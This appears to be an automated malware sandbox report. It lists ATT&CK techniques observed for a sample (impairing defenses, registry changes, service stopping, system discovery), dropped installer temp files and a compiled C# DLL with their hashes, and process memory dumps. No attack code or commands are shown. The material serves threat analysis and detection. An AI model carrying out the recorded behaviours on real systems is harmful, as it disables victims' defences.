File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\f766d28.rbs

Filesize
2KB

MD5
911533496523daaa9945e31c9f12dbfe

SHA1
57ef63b7793017b4cfedc5b0ffd80bea6452fff8

SHA256
041c1a973e64fd3ed8aa41848469d273a9a013696d66110cd2e4efa31d05137d

SHA512
e83e11bb025e0e25f21cfde3563d1a4348ad835f5b74b6d285b5df0c2fc461cb248bba0a4b286effd6eed4a86fcabbc64d0e5281b4904d0ef2eb29aff1c9a9dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6182.tmp

Filesize
1KB

MD5
806b2869662dccd3a363c6388d3f361e

SHA1
5ff7da19c275edf3467d9196a1cc0d7aa2361fa2

SHA256
e195d40c4cbc4381fe0c60fc53b14727b80c1ac3bc4dc617ee6e46bff82b1b17

SHA512
377801b9f24019fa02b14ba9950cc64c7dd70c353d28bbefe8e498e6f73b0694758b77f8076a356fb1b8093e150235ea37995efd5da3e8ba1b3b2ab13a09632a

Download Submit
C:\Users\Admin\AppData\Local\Temp\lqfr9jjd.dll

Filesize
3KB

MD5
62b546a92e6ba605c55dfb99a8e94148

SHA1
c5756de30c48606b9464fd4eca23022b8fa03c77

SHA256
120786cbd51a9942ada9c72f3f78765b906edf043e1d08f70b0b00ed8cf0870b

SHA512
2dafb55bdf547f3a81cba1bcbfa05ec828caa5779020fff7226c063aff5227b99636268816ed352cfdc03074b0c776d33869165c22be2aecdae1d9e879579913

Download Submit
C:\Users\Admin\AppData\Local\Temp\lqfr9jjd.pdb

Filesize
7KB

MD5
f6a853c213575de73bb23e9ecd3e9c16

SHA1
ed76313776c954f60604f591fbab402ee3788621

SHA256
cc8320bfa7b77bd8fcd15352a5f251d205d7e666c44d72177942046a1635668a

SHA512
82cbe4b83737f2660e5a09a6de21969bf43e7c0fc33fd8fb77ef24c4c80bae4ca7805df1cc576f6530d9ede28b460674615f05daac064d8647576d8ac4181637

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\207ZWZ8970TQ4QMKSC6K.temp

Filesize
7KB

MD5
c570ede5fdc6c52e252a11783f3c7723

SHA1
4c1aa56bfd1f0871233a06e8ace1d381e2d769d1

SHA256
36bde9fe7822da3fde048014220bda51ec24c516cfb15f074067f94a418baaa8

SHA512
1af9c5fb45b7e5aa27ab668d6566fa5233d83ba85b7ce9533f69cef485e35bd0bfe2e19220b0662fbe6a767439666e175ddc4cd3dad7ebe947b3bc614ef6385a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c570ede5fdc6c52e252a11783f3c7723

SHA1
4c1aa56bfd1f0871233a06e8ace1d381e2d769d1

SHA256
36bde9fe7822da3fde048014220bda51ec24c516cfb15f074067f94a418baaa8

SHA512
1af9c5fb45b7e5aa27ab668d6566fa5233d83ba85b7ce9533f69cef485e35bd0bfe2e19220b0662fbe6a767439666e175ddc4cd3dad7ebe947b3bc614ef6385a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c570ede5fdc6c52e252a11783f3c7723

SHA1
4c1aa56bfd1f0871233a06e8ace1d381e2d769d1

SHA256
36bde9fe7822da3fde048014220bda51ec24c516cfb15f074067f94a418baaa8

SHA512
1af9c5fb45b7e5aa27ab668d6566fa5233d83ba85b7ce9533f69cef485e35bd0bfe2e19220b0662fbe6a767439666e175ddc4cd3dad7ebe947b3bc614ef6385a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c570ede5fdc6c52e252a11783f3c7723

SHA1
4c1aa56bfd1f0871233a06e8ace1d381e2d769d1

SHA256
36bde9fe7822da3fde048014220bda51ec24c516cfb15f074067f94a418baaa8

SHA512
1af9c5fb45b7e5aa27ab668d6566fa5233d83ba85b7ce9533f69cef485e35bd0bfe2e19220b0662fbe6a767439666e175ddc4cd3dad7ebe947b3bc614ef6385a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c570ede5fdc6c52e252a11783f3c7723

SHA1
4c1aa56bfd1f0871233a06e8ace1d381e2d769d1

SHA256
36bde9fe7822da3fde048014220bda51ec24c516cfb15f074067f94a418baaa8

SHA512
1af9c5fb45b7e5aa27ab668d6566fa5233d83ba85b7ce9533f69cef485e35bd0bfe2e19220b0662fbe6a767439666e175ddc4cd3dad7ebe947b3bc614ef6385a

Download Submit
C:\Windows\Installer\MSI64FA.tmp

Filesize
2.9MB

MD5
eb9a4cf233789b96f940be0186a26988

SHA1
002a1cee740fa212732379d1f00dbcf7c0cccbf2

SHA256
24d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8

SHA512
725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce

Download Submit
C:\Windows\Installer\MSI68C2.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI6AC6.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI6C3E.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
C:\Windows\Installer\MSI6CBB.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
C:\Windows\Installer\MSI6CBB.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6181.tmp

Filesize
652B

MD5
068e4daeb33499a59b8586e83f85555a

SHA1
dca296a3aea9056e532b6f29f5daad5ce55950f9

SHA256
4c9663d113edb0ccfbb2aac425bbc922efd3dd7ba0fb0db4b98f72a16e502ff1

SHA512
dd27a76c95b1157d2406c78105290a155537804488c5e3f0353964725f2348a52309435d4a1ff38c68651215e808479c1636ba4b5d5c658252cd6600117df797

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lqfr9jjd.0.cs

Filesize
354B

MD5
5cc66596055771b708c426b09785ed18

SHA1
fe11be68b5f5f01304e2c6b62458ba70ccc9a575

SHA256
530c7292814fa916aa2846672d0bd17cb4ba54cb8f4f61b9d84e01a51b857c08

SHA512
dc0c9385a85ade45584fc782de2ab285d5ceb535d0ef6d19b610e34c1fde5e6e76fc88d0b6b0e9f922562c4fe26aaaccf6204fae5053e3679f3a104cbf2dfd5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lqfr9jjd.cmdline

Filesize
309B

MD5
f73d5f425b2d234c5e6b87068abc787b

SHA1
182679bb92b9b36cbc2728c3e1087550dc7dd86d

SHA256
6b35530439feb082c824791bb37f6507da3a380dc0e605158772c21f2c9087fd

SHA512
e605b6c22e154af584e20907a72bf46bf81009745bd72e8e7e07aa09dd0273a7a879804e81e44ece3424fe3729cac91a58851bc4ef8e948900e82d13556fdbd5

Download Submit
\Windows\Installer\MSI68C2.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\Windows\Installer\MSI6AC6.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
\Windows\Installer\MSI6C3E.tmp

Filesize
537KB

MD5
d7ec04b009302b83da506b9c63ca775c

SHA1
6fa9ea09b71531754b4cd05814a91032229834c0

SHA256
00c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4

SHA512
171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c

Download Submit
\Windows\Installer\MSI6CBB.tmp

Filesize
379KB

MD5
305a50c391a94b42a68958f3f89906fb

SHA1
4110d68d71f3594f5d3bdfca91a1c759ab0105d4

SHA256
f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f

SHA512
fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7

Download Submit
memory/328-60-0x0000000002030000-0x0000000002070000-memory.dmp

Filesize
256KB

Download
memory/904-108-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/904-115-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/904-114-0x0000000002770000-0x00000000027B0000-memory.dmp

Filesize
256KB

Download
memory/904-113-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/904-109-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/904-107-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2164-27-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2164-30-0x00000000051A0000-0x00000000051EF000-memory.dmp

Filesize
316KB

Download
memory/2164-54-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2164-25-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2164-26-0x0000000002640000-0x0000000002680000-memory.dmp

Filesize
256KB

Download
memory/2164-28-0x00000000050B0000-0x0000000005102000-memory.dmp

Filesize
328KB

Download
memory/2440-53-0x0000000002040000-0x0000000002080000-memory.dmp

Filesize
256KB

Download
memory/2440-112-0x0000000002040000-0x0000000002080000-memory.dmp

Filesize
256KB

Download
memory/2440-133-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2440-110-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2440-52-0x0000000002040000-0x0000000002080000-memory.dmp

Filesize
256KB

Download
memory/2440-51-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2440-50-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2440-111-0x0000000002040000-0x0000000002080000-memory.dmp

Filesize
256KB

Download
memory/2744-15-0x0000000002130000-0x0000000002170000-memory.dmp

Filesize
256KB

Download
memory/2744-14-0x0000000002130000-0x0000000002170000-memory.dmp

Filesize
256KB

Download
memory/2744-13-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2744-12-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2744-32-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2744-34-0x0000000002130000-0x0000000002170000-memory.dmp

Filesize
256KB

Download
memory/2912-39-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2912-41-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/2912-100-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/2912-42-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/2912-106-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/2912-95-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2912-43-0x00000000050A0000-0x00000000050F2000-memory.dmp

Filesize
328KB

Download
memory/2912-44-0x0000000005160000-0x00000000051AF000-memory.dmp

Filesize
316KB

Download
memory/2912-40-0x000000006B370000-0x000000006B91B000-memory.dmp

Filesize
5.7MB

Download
memory/2912-99-0x0000000002740000-0x0000000002780000-memory.dmp

Filesize
256KB

Download
memory/3024-31-0x0000000004FB0000-0x00000000050B0000-memory.dmp

Filesize
1024KB

Download
memory/3024-29-0x0000000071A0D000-0x0000000071A18000-memory.dmp

Filesize
44KB

Download
memory/3024-8-0x0000000004FB0000-0x00000000050B0000-memory.dmp

Filesize
1024KB

Download
memory/3024-0-0x000000002F3A1000-0x000000002F3A2000-memory.dmp

Filesize
4KB

Download
memory/3024-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/3024-2-0x0000000071A0D000-0x0000000071A18000-memory.dmp

Filesize
44KB

Download